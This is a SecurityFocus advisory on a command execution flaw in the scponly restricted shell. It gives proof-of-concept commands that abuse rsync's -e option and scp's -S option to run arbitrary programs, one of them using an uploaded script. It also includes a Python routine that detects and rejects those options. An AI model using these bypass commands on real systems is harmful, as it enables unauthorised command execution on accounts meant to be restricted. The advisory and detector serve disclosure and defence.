SCPOnly Remote Arbitrary Command Execution Vulnerability

The following proof of concept examples are available:

ssh restricteduser@remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp'

scp command.sh restricteduser@remotehost:/tmp/command.sh

ssh restricteduser@remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'
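A defensive check for the options the commands above rely on, added here as an example and not part of the original advisory or of scponly's own code: it parses a requested command line and reports rsync -e/--rsh or scp -S, the options that name a program to execute. The function name exec_option, the RULES table and the sample lines are assumptions made for this illustration.

```python
import os
import shlex

# Per program: the short/long option that names a helper program to run, and
# the short options that consume an argument (taken from the rsync and scp
# man pages; an assumption to adjust for the versions actually installed).
RULES = {
    "rsync": {"short": "e", "long": "--rsh", "takes_arg": "efBTM"},
    "scp": {"short": "S", "long": None, "takes_arg": "cFiloPS"},
}


def exec_option(command_line):
    """Return (program, option, value) if the command names a helper program, else None."""
    argv = shlex.split(command_line)
    if not argv or os.path.basename(argv[0]) not in RULES:
        return None
    prog = os.path.basename(argv[0])
    rule, args, i = RULES[prog], argv[1:], 0
    while i < len(args):
        arg = args[i]
        following = args[i + 1] if i + 1 < len(args) else ""
        if arg == "--":  # end of options: the rest are file operands
            break
        if rule["long"] and arg.split("=", 1)[0] == rule["long"]:
            value = arg.split("=", 1)[1] if "=" in arg else following
            return (prog, rule["long"], value)
        if arg.startswith("-") and not arg.startswith("--"):
            for pos, ch in enumerate(arg[1:], start=1):
                if ch == rule["short"]:
                    return (prog, "-" + ch, arg[pos + 1:] or following)
                if ch in rule["takes_arg"]:
                    if pos == len(arg) - 1:
                        i += 1  # its value is the next word; skip it
                    break  # rest of this word is that option's value
        i += 1
    return None


# Constructed sample requests: the two remote commands from the proof of
# concept above, plus ordinary transfers that must not be flagged.
SAMPLES = [
    'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp',
    "scp -S /tmp/command.sh localhost:/dev/null /tmp",
    "scp -t /tmp/command.sh",
    "scp -iSkey.pem -P 2222 report.txt /tmp",
    "rsync -a -- -e /tmp",
]

if __name__ == "__main__":
    for line in SAMPLES:
        hit = exec_option(line)
        print("REJECT" if hit else "allow ", line, hit or "")
```

A restricted shell wrapper would refuse any request for which exec_option returns a tuple; the check also covers the clustered (-ave) and --rsh= spellings of the same option.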


 

Copyright 2010, SecurityFocus